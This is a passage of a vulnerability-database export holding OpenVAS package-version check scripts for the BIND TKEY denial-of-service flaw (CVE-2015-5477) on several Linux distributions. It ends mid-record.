"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:09", "description": "Mageia Linux Local Security Checks mgasa-2015-0298", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2015-0298", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310130080", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310130080", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2015-0298.nasl 11692 2018-09-28 16:55:19Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.130080\");\n script_version(\"$Revision: 11692 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 10:42:28 +0300 (Thu, 15 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 18:55:19 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2015-0298\");\n script_tag(name:\"insight\", value:\"An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit (CVE-2015-5477).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2015-0298.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2015-0298\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.2.P3~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind FEDORA-2015-12335", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869832", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869832", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2015-12335\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869832\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:48 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2015-12335\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12335\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163006.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.10.2~4.P3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-31T18:37:57", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-04T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bind (openSUSE-SU-2015:1335-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850667", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850667", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850667\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-08-04 06:27:31 +0200 (Tue, 04 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bind (openSUSE-SU-2015:1335-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bind was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2015-5477: Remote DoS via TKEY queries (boo#939567)\n\n Exposure to this issue can not be prevented by either ACLs or\n configuration options limiting or denying service because the exploitable\n code occurs early in the packet handling.\");\n\n script_tag(name:\"affected\", value:\"bind on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2015:1335-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-chrootenv\", rpm:\"bind-chrootenv~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debuginfo\", rpm:\"bind-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-debugsource\", rpm:\"bind-debugsource~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo\", rpm:\"bind-libs-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd\", rpm:\"bind-lwresd~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-lwresd-debuginfo\", rpm:\"bind-lwresd-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-utils-debuginfo\", rpm:\"bind-utils-debuginfo~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bind-libs-debuginfo-32bit\", rpm:\"bind-libs-debuginfo-32bit~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ind-doc\", rpm:\"ind-doc~9.9.4P2~2.14.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:08", "description": "Oracle Linux Local Security Checks ELSA-2015-1514", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-1514", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123049", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123049", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1514.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123049\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1514\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1514 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1514\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1514.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-07-30T00:00:00", "type": "openvas", "title": "Ubuntu Update for bind9 USN-2693-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2012-5689"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842391", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842391", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for bind9 USN-2693-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842391\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-30 05:14:24 +0200 (Thu, 30 Jul 2015)\");\n script_cve_id(\"CVE-2015-5477\", \"CVE-2012-5689\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bind9 USN-2693-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind9'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jonathan Foote discovered that Bind\nincorrectly handled certain TKEY queries. A remote attacker could use this issue\nwith a specially crafted packet to cause Bind to crash, resulting in a denial of\nservice. (CVE-2015-5477)\n\nPories Ediansyah discovered that Bind incorrectly handled certain\nconfigurations involving DNS64. A remote attacker could use this issue with\na specially crafted query to cause Bind to crash, resulting in a denial of\nservice. This issue only affected Ubuntu 12.04 LTS. (CVE-2012-5689)\");\n script_tag(name:\"affected\", value:\"bind9 on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2693-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2693-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.9.5.dfsg-3ubuntu0.4\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bind9\", ver:\"1:9.8.1.dfsg.P1-4ubuntu0.12\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "openvas", "title": "Fedora Update for bind FEDORA-2015-12357", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-1349", "CVE-2014-8500"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869830", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869830", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind FEDORA-2015-12357\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869830\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:29 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-4620\", \"CVE-2015-1349\", \"CVE-2014-8500\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind FEDORA-2015-12357\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12357\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163007.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.9.6~10.P1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:22", "description": "Gentoo Linux Local Security Checks GLSA 201510-01", "cvss3": {}, "published": "2015-10-19T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201510-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-4620", "CVE-2015-5722", "CVE-2015-1349", "CVE-2015-5986"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121414", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121414", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-01.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121414\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-19 07:03:58 +0300 (Mon, 19 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-01\");\n script_tag(name:\"insight\", value:\"A vulnerability has been discovered in BINDs named utility leading to a Denial of Service condition.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-01\");\n script_cve_id(\"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-5986\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-01\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-dns/bind\", unaffected: make_list(\"ge 9.10.2_p4\"), vulnerable: make_list(\"lt 9.10.2_p4\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-01-27T18:38:41", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bind (EulerOS-SA-2019-1433)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1286", "CVE-2015-5477", "CVE-2015-4620", "CVE-2015-8000", "CVE-2016-8864", "CVE-2016-2775", "CVE-2015-5722", "CVE-2016-1285", "CVE-2018-5740", "CVE-2017-3136", "CVE-2016-9131", "CVE-2016-2776", "CVE-2017-3145", "CVE-2014-0591", "CVE-2015-1349", "CVE-2014-8500", "CVE-2017-3142", "CVE-2017-3143"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191433", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191433", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public 